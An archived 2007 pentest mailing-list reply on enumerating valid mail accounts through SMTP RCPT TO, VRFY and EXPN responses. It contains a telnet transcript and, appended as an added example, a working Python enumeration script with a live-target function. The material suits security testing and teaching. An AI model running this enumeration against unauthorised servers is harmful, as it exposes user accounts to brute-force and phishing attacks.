RE: Pentesting Openmail Web login

From: Marco Ivaldi (raptor@mediaservice.net)
Date: Fri May 25 2007 - 06:43:15 EDT


On Thu, 24 May 2007, Clemens, Dan wrote:

> The use of SMTP commands may help you - expn or vrfy will help you in
> enumerating accounts.

As a side note, I've seen quite a lot of SMTP servers (Sendmail, Postfix,
Exchange, etc.) configured to leak valid users with the RCPT TO command
too, e.g.:

raptor@pandora:~$ telnet mail 25
Trying x.x.x.x...
Connected to mail.
Escape character is '^]'.
220 mail ESTMP none
helo foo
250 mail
mail from:<test@test.com>
250 Ok
rcpt to:<root>
250 Ok
rcpt to:<noexistant>
550 <noexistant>: Recipient address rejected: User unknown in local
recipient table

Sometimes, such as in this example, system users are leaked; sometimes
only email addresses can be recovered. In some situations, the latter may
be considered "a feature, not a bug" (tm), as for instance it helps to
keep a lower resource usage on servers heavily targeted by spam. YMMV.

My brutus.pl tool implements this information leak attack, together with
the classic VRFY/EXPN (it always amazes me how these are still active on
some default configurations!):

http://www.0xdeadbeef.info/code/brutus.pl

Cheers,

-- 
Marco Ivaldi, OPST
Chief Security Officer    Data Security Division
@ Mediaservice.net Srl    http://mediaservice.net/
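The RCPT TO enumeration described in the message above, as an added example in Python; it is not part of the original post and is not brutus.pl. It replays the same dialogue as the telnet transcript (HELO, MAIL FROM, RCPT TO), classifies each reply code, and first probes a random canary recipient so that a catch-all or accept-then-bounce server is not mistaken for a leaky one. The FakeMta class and its scripted replies are constructed for offline use; the canary prefix, the helo/sender values, and the candidate user lists are assumptions.

```python
"""Enumerate valid recipients on an SMTP server via RCPT TO.

Added example, not the brutus.pl tool from the post.  Replays the
HELO / MAIL FROM / RCPT TO dialogue from the transcript and classifies
each reply code.  Python 3 standard library only.
"""
import re
import secrets
import socket

REPLY_RE = re.compile(r"^(\d{3})([ -])(.*)$")


def read_reply(readline):
    """Read one SMTP reply, joining '250-' continuation lines.

    readline() returns bytes (one line) or b"" on EOF.  Returns (code, text)."""
    parts = []
    while True:
        raw = readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        m = REPLY_RE.match(raw.decode("latin-1", "replace").rstrip("\r\n"))
        if not m:
            raise ValueError("malformed SMTP reply: %r" % raw)
        code, sep, text = m.groups()
        parts.append(text)
        if sep == " ":          # a space after the code marks the last line
            return int(code), "\n".join(parts)


def classify(code):
    """Map an RCPT TO reply code to a verdict."""
    if 200 <= code < 300:
        return "valid"        # 250 Ok: recipient accepted
    if code == 550:
        return "invalid"      # "User unknown in local recipient table"
    if 400 <= code < 500:
        return "tempfail"     # greylisting / rate limiting: retry later
    return "rejected"         # other 5xx: relay denied, policy, syntax


class SmtpProbe:
    """Drive the SMTP dialogue over any (readline, send) pair of callables."""

    def __init__(self, readline, send):
        self.readline = readline
        self.send = send

    def cmd(self, line):
        self.send((line + "\r\n").encode("ascii"))
        return read_reply(self.readline)

    def enumerate(self, candidates, helo="foo", sender="test@test.com"):
        """Return (leaks, verdicts).  leaks is False when a random canary is
        accepted: the server is catch-all, so RCPT verdicts carry no info."""
        code, banner = read_reply(self.readline)
        if code != 220:
            raise RuntimeError("unexpected banner: %d %s" % (code, banner))
        for line in ("HELO " + helo, "MAIL FROM:<%s>" % sender):
            code, text = self.cmd(line)
            if code != 250:
                raise RuntimeError("%s refused: %d %s" % (line, code, text))
        canary = "nx" + secrets.token_hex(6)        # assumed-nonexistent local part
        leaks = classify(self.cmd("RCPT TO:<%s>" % canary)[0]) == "invalid"
        verdicts = {u: classify(self.cmd("RCPT TO:<%s>" % u)[0]) for u in candidates}
        self.cmd("QUIT")
        return leaks, verdicts


def probe_host(host, candidates, port=25, timeout=10.0):
    """Run the enumeration against a live server (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        return SmtpProbe(rfile.readline, sock.sendall).enumerate(candidates)


class FakeMta:
    """Constructed stand-in for a Postfix-style MTA; replies are scripted to
    mirror the transcript above, not taken from a real server."""

    def __init__(self, local_users, catch_all=False):
        self.users = set(local_users)
        self.catch_all = catch_all            # accept every RCPT (no leak)
        self.queue = [b"220 mail ESMTP none\r\n"]

    def readline(self):
        return self.queue.pop(0) if self.queue else b""

    def send(self, data):
        line = data.decode("ascii").strip()
        verb = line.split(":")[0].split(" ")[0].upper()
        if verb in ("HELO", "MAIL"):
            reply = "250 Ok"
        elif verb == "RCPT":
            m = re.search(r"<([^>@]*)(?:@[^>]*)?>", line)   # local part only
            user = m.group(1) if m else ""
            if self.catch_all or user in self.users:
                reply = "250 Ok"
            else:
                reply = ("550 <%s>: Recipient address rejected: "
                         "User unknown in local recipient table" % user)
        elif verb == "QUIT":
            reply = "221 Bye"
        else:
            reply = "502 5.5.2 Error: command not recognized"
        self.queue.append((reply + "\r\n").encode("ascii"))


def demo(catch_all=False):
    """Offline run against the constructed MTA with users root and postmaster."""
    fake = FakeMta(["root", "postmaster"], catch_all=catch_all)
    probe = SmtpProbe(fake.readline, fake.send)
    return probe.enumerate(["root", "noexistant", "www-data"])
```

Against a real target, `probe_host("mail", ["root", "admin", "www-data"])` does the same thing over TCP/25. The canary step is the check worth keeping: a server that answers 250 to every RCPT TO (catch-all domains, Exchange with recipient filtering off, some anti-spam front ends) produces an all-"valid" list that means nothing, and a run of 4xx verdicts means you are being greylisted or rate limited and should slow down rather than read anything into the codes.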


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:50 EDT